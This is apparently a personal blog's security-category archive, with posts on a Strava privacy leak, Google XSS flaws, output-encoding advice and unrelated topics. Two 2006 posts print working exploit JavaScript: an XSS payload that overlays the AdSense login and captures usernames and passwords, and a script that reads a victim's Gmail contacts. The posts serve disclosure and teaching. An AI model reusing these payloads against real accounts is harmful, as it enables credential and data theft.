Archive for the 'Security' Category

Strava “API” and privacy leaks.

Monday, July 8th, 2013

I previously had some pages which used the Strava API to do useful things for me, the one I used most was seeing who rode climbs together, it simply used the API to see everyone who rode a segment and then tracked their start times so you could see who was riding with who. It was also really useful to see changes in time between groups in a race. ie the break started a lap 2 minutes ahead and then next lap only 1 minute.

Strava killed their previous API though, and despite an initial promise from them for me to have access to their new API if I agreed to remove their embarrasing GPX export service which revealed the private zones of peoples rides, I never got access, they just stopped emailing. (The privacy flaw was in their export, not in anything I did…).

I’m stuck here now without access to the useful features, so I’ve started looking for a replacement. I don’t have access to their new APIs, and in fact I don’t think I’d bother investing the time in them anyway, once bitten… But I started looking at the services they use to populate the pages themselves. An immediate thing hits me, their page API allows access to private activities.

Accessing private activities

Here’s a private run of mine, you won’t be able to see it, however here’s a JSON file of the exact run. So as long as you know the ID of a users ride, you can get all the info about it. It also completely ignores the privacy zones you have configured when exporting a private ride. A public version the same as the last run this has a privacy zone (it’s only hiding a sports club which is the start for these races, it’s not my house!) and you can see from exporting this one that the points within the privacy zone are reset to 0,0 rather than the actual lat/lon. Yet on the fully private activity, those same points were available, private activities actually provide more risk to revealing your location than public ones.

Private rides are just security through obscurity, and the ID’s aren’t even that obscure, don’t give Strava data that you actually want private.

Distances within privacy zones are provided

Another privacy flaw here is that while the lat/lon’s on public rides in your privacy zone are hidden, the distances you travel for each of those points in the private zone are not, so it’s a pretty easy algorithm to get back to very close to the start of your ride/run unless you do some laps inside your zone or something similar to obfuscate it. Altitude is also provided for the points within the zone, so that may reveal more for those of you who don’t live in flat lands.

Strava Lack of time?

Strava have repeatedly said their reason for not supporting old API’s or for providing access to the new API is lack of time. I guess I can now believe this, as they don’t even appear to have the time to invest in even basic honouring of their privacy assurances. I did try emailing them before publishing this, and then tried twitter but still no response.

The pub worker theft device

Thursday, August 17th, 2006

As a homeless internet developer, I spend a lot of my time in pubs using their wifi and drinking their beer, drinking beer has a side-effect, and not just on my code quality, my bladder fills and I need to partake of the facillities, this means abandoning the laptop on the table of a strange pub in a strange town - the data’s safe, that’s encrypted - not for me the embarrassment of losing a laptop chock full of an unsecured source tree, but the machine is worth a fair bit, and it’d be bloody annoying too.

So I was thinking - T60’s and indeed all decent laptops already have an accellerometer in it, why isn’t there a program which starts shrieking “Help, Help, he’s stealing me” at full volume. Probably be really crap, but it should at least exist - people?

Of course if you do see a strange bloke sitting in a corner drinking alone yet talking to himself and imaginary people on IRC, go buy him a drink - it might be me.

Don’t serve JSON as text/html

Wednesday, July 5th, 2006

Another day, another XSS flaw, this one in Google again, but this is a little more interesting than the normal ones, what this one shows is how JSON results add an extra vector to attack that might be missed by your QA team.

The problem here was that the JSON was returned with a mime-type of text/html, a browser will render that as if it was an HTML page, even if it’s really just a javascript snippet. The easiest way to protect against these is to ensure that all javascript recieved by the XMLHTTPRequest object is returned with a suitable mime-type - application/json That will mean even when you make a mistake and write un-encoded untrusted data to the document, it won’t allow people to attack your site.

The google exploit was reported here, it’s at the time of writing unpatched, unfortunately that was down to the discoverer not giving google any time to fix, whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously, they recently had a presentation to the QA team that you can watch on Google Video.

As I’ve said before, the everything on a single domain causes problems, it means any exploit anywhere on the domain, allows you to exploit any service provided for the domain. This exploit is also present in https:// google, so to re-enforce the problem XSS can present to a user, and why XSS is not simply about cookie stealing. Here’s a simple demonstration of using the exploit to steal username and password from google adsense.

The exploit is simply used to create an IFRAME that fills the document and points it to a google adsense login, when the user logs in, the username and password are alerted - also after logging in, then the “today’s earnings” are alerted. Of course a real attacker would not alert these fields, but would sent them off to a site to be collected later. Are google adsense passwords useful? Would you notice if the address or account to get the cash changed until you’d not got the cheque?

The script code is simple, you don’t need to be clever, and phishers generally aren’t stupid, it takes brains to launder money.

document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></div>";

function go() {
  try {
  var win=window.frames[0];
  win.document.body.style.overflow="hidden";
  win.document.body.style.border="0px solid white";
  var doc=win.frames[0].document.forms[0];
  doc.onsubmit=function() {
   alert("Your adsense username and password are:n"+
   doc["Email"].value+'nandn'+doc["Passwd"].value);
   x=window.open(location.href);
  }
 } catch (e) {
  try {
   var win=window.frames[0];
   var doc=win.document.body;
   var x="Today's Earnings:"+doc.getElementsByTagName('h1')[0];
   alert(x.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
  } catch (e) {}
 }
}

The result is clear:

Google Flaw not fixed, GMail contact stealing demo

Monday, April 10th, 2006

Despite the flaw being announced a long time ago, the google Book search flaw is still broken. It’s surprising that Google aren’t taking it more seriously, this one is very easy to use to automate a users GMail account, stealing contacts, or sending email if they are logged into google when they’re tricked into visiting such a page.

Here’s an example that will list your gmail contacts List your gmail contacts

There’s no reason why a page cannot also send emails, steal the contents emails or anything else. Given the length of time this has been public (I didn’t find this flaw, it was posted to bugtraq on the 4th April, or 6 days ago) it’s very possible that a worm that stole GMail information is already circulating. Disable script on google.com!

The script that gets the contacts is trivial:

function x() {
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","http://mail.google.com/mail/?view=page&name=contacts&ver=e0ad439ebad5ad16",false);
	xmlhttp.send('');
	return xmlhttp.responseText;
}

the x function then contains a json structure containing the contacts, this can be easily changed into the output format with some simple regular expressions: see test6.js for those and the complete included script. The livehttpheaders extension in FireFox is how to find out how to do other things.

Yet More Google Security Failures

Monday, April 10th, 2006

Google are still failing to keep even their flagship google.com domain secure from Cross Site Scripting attacks, others it allows arbitrary code insertion into google.com.

See googles new pay search service (Not really of course, just my credit card form!)

The flaw appears to be in failing to clean the characters in a book result search, It’s a trivial flaw, that every google employee should know about, the same class of flaws keeps getting produced, Google developers, and google testers would appear to be uninterested in security, not even bothering to test flaws that they’ve found before.

How not to be an incompetent developer

Sunday, November 27th, 2005

The last few entries I’ve called developers incompetent for their security flaws, in the comments, some people have thought this unfair of me. They rightly point out that security is not easy, so it wasn’t reasonable to call people who fail incompetent, I stand by my description though. Security is hard, but this type of security problem certainly isn’t, in fact it’s not just a security problem, it’s also a “the site doesn’t work” problem.

The fundamental cause of these problems is content being written into the page unencoded, so the character < is considered the start of an HTML element, rather than part of the content. Or if the content is being written into an attribute then the character " or ' are considered to be the end of the attribute. (or even a simple space if you don’t bother quoting your attributes) This lack of encoding isn’t just a security flaw though, the site simply won’t work properly, as any test data that includes the characters won’t appear correctly on the page, this is the main reason why I blame incompetence on the testers and developers, or simple laziness, and not bothering to test at all.

Steps a developer can take

Hare are 3 simple things I use as a developer to mitigate the risk.

  • Have < " in your toy test data, easy of course in your text input boxes, but also do it in your select values and radio values, that way you never need to actually test by directly entering a risky querystring, you can leave that to the tester, yet you’ll still catch the bug as you’re developing.
  • Place all non-html output variables into a single object, it doesn’t matter if the input comes from the user, or the database, it still needs to be encoded, okay a number should never need encoding, but there’s little lost to doing so anyway and you’ll reduce the risk from untrusted data. You can make this object only output encoded content, e.g. in javascript, you could use something like:
     function safeString(str) {  this.value=str; } safeString.prototype.toString=function() {  return htmlencode(this.value); } safe=new safeString(\"<script>alert(1)</script>\");document.write(safe);

    Of course you can still make the mistake and not use your object, but it should be much easier to spot the bug early in the process.

  • This is mainly the testers job of course, but in an idle moment you should change the query string of any page to include a load of the bad characters, and just see if the page is happy, they should appear just like any other character does.

These methods won’t stop all security problems, you’ll still need to think properly about security, but they at least make you a step above the current Google or Yahoo developer.

BBC Spam

Saturday, October 22nd, 2005

I got some BBC spam today, well actually not BBC spam, but Mentorn TV spam who are producing a TV show for the BBC, the spam is looking for people to appear on the show - it sounds like one of those crappy BBC 3 things.

The BBC say

Don’t reply, ever!
Never buy anything from a spammer. Don’t make spamming worth the effort - plus you’ll get even more spam once they know you’re willing to buy.

So I expect the BBC will be rather disappointed in the number of particpants the show gets, and will presumably be ceasing all business with Mentorn TV, which would actually be a great shame as it produces a lot of quality shows, but really that just makes it worse that they’ve descended into sending spam.

The (current?) failure of local search

Tuesday, September 27th, 2005

There’s lots of talk, and lots of work in the search engine world about local search, I’m sure the reason is to get more advertisers - there’s only so many people who it’s relevant for to advertise globally, or even nationally, local shops for local people however would pay for local adverts.

I wanted to find a bike shop in Kingston, so I could find one that’s likely to have a tourer as I’m thinking hard of cycling longer distances to get rid of the current fat belly (very old readers may remember me running 20:19 in the club handicap a few years back, 28:05 was my this month fat time).

One of things I knew was there was Evans cycles near the station, and there’s one just down the road from me in surbiton - a few miles from Kingston. Google local was my first choice as they put it on the map which is great. First there’s a search for Bike shop and Kingston. First up, google offers me 2 Kingston’s to disambiguate - good, but I’ve searched for stuff in Kingston before, it really should remember which Kingston I’m near, at least give me the results for upon Thames, and give a link “did you mean Kingston upon Hull” if I’ve just asked 5 minutes ago.

Telling it Kingston upon Thames I get some results. The nearest result is Action Bikes - 3.8 miles away from Kingston in Richmond, the furthest is 13 miles away in Harrow or Lewisham - neither of the two bike shops I actually know about are listed at all - this is the big failure of local search - people know their local area, they know if there’s results missing, with a web search it doesn’t matter, I’ve no idea what resources the search engine hasn’t found, but with local search I know what’s missing and I’ll get annoyed.

Yahoo doesn’t have something called a local search, but it does have a business finder which does the same job. So bike shop in kingston returns no results at all, but a suggestion to try more general words, and bike in kingston turns up a big list mostly linked to motorbikes, however there’s one on the first page and it has a link to a category cycle shops clicking on that I get a list of 4 in Kingston, no way to enlarge the area though, and it doesn’t mention the ones just outside Kingston. It also took 4 pages and thought of my search terms, much too much effort on a smartphone, and too much effort even in the office.

MSN search was just crazy bike shop in kingston tells me that “kingston” was not recognized. Please be more specific changing kingston to anything fromKingston upon Thames to Surrey or London didn’t get me anywhere at all, I always got the same message - I couldn’t find any location that it actually worked for!

The providers of business information to google and yahoo are Yell and ThomsonLocal. Yell performed the search without any problems, both guiding me through the process of narrowing down what I wanted to cycle shops, and returning me a list in Kingston and a wider area. Thomson Local however fail to map bike shop to anything about bikes, somehow suggesting I might want shop fittings, if I deliberately choose cycle shops (what I’ve learnt they want them called) then it finds them no problem.

Local search appears to have a very long way to go, and will always suffer the problem of being different to what the local person knows of their locality - if you know the chip shop has closed, you’ll be annoyed if it appears on the map, if you know the best chip shop is on the high street and there’s nothing there on the search you’ll doubt all the results. I can’t see local search being a useful feature to me, they have a very long way to go, if you have to use one though, yahoo is the way to go, even though they still haven’t bothered with a background colour.

Fonts and Web Applications

Thursday, June 30th, 2005

In my Route planner toy, I use the airplane character from unicode () for the airports. I got a complaint today, that it looked crap because they only got a little square instead of a plane. Of course not all machines are going to have a font containing the plane character, so what are the options?

One option would be to use images instead, but this is slower to render and download aswell as a more complicated DOM to parse (and in an ideal world, you’d still need to thing of how to make it accessible when images are disabled).

Instead I’ve decided to have a go at detecting if the font is actually supported, and if it is not, replace the plane symbol with a simple +. The code is pretty simple, and relies on the fact that symbols in fonts have different sizes, so it compares the size of a 10 of the testing symbols, with 10 of a symbol from a private use area in unicode.

function symbolSupported(testChr) {  var testDiv=document.createElement('div');  testDiv.style.display=\"block\";  testDiv.innerHTML=\"<span class=airport style='font-size:10em;'>&#983040;&#983040;\"+    \"&#983040;&#983040;&#983040;&#983040;&#983040;&#983040;&#983040;&#983040;</span><\"+    \"span class=airport style='font-size:10em;'>\"+repeatStr(\"&#x\"+testChr.toString(16)+\";\",10)+\"</span>\";  document.body.appendChild(testDiv);  var supported=!(testDiv.firstChild.offsetWidth*testDiv.firstChild.offsetHeight ==         testDiv.lastChild.offsetWidth*testDiv.lastChild.offsetHeight);  document.body.removeChild(testDiv);  return supported;}function repeatStr(str,n) {  var out=[];  for (i=0;i<n;i++) {    out.push(str);  }  return out.join(\"\");}

This seems to work pretty well, where I’ve tested it, but I’m not that happy with it - is it safe that the private use area is empty? Is it safe that the size, even with 10 characters with 100em is different between the symbols? Still for this use case, it’s relatively safe as the alternative of +’s would be acceptable to anyone, but for more complicated symbols and use cases I don’t think it would be safe.

Does anyone have a better approach that would work here?

Addictive Fast Food

Saturday, January 1st, 2005

An Interesting Economist Article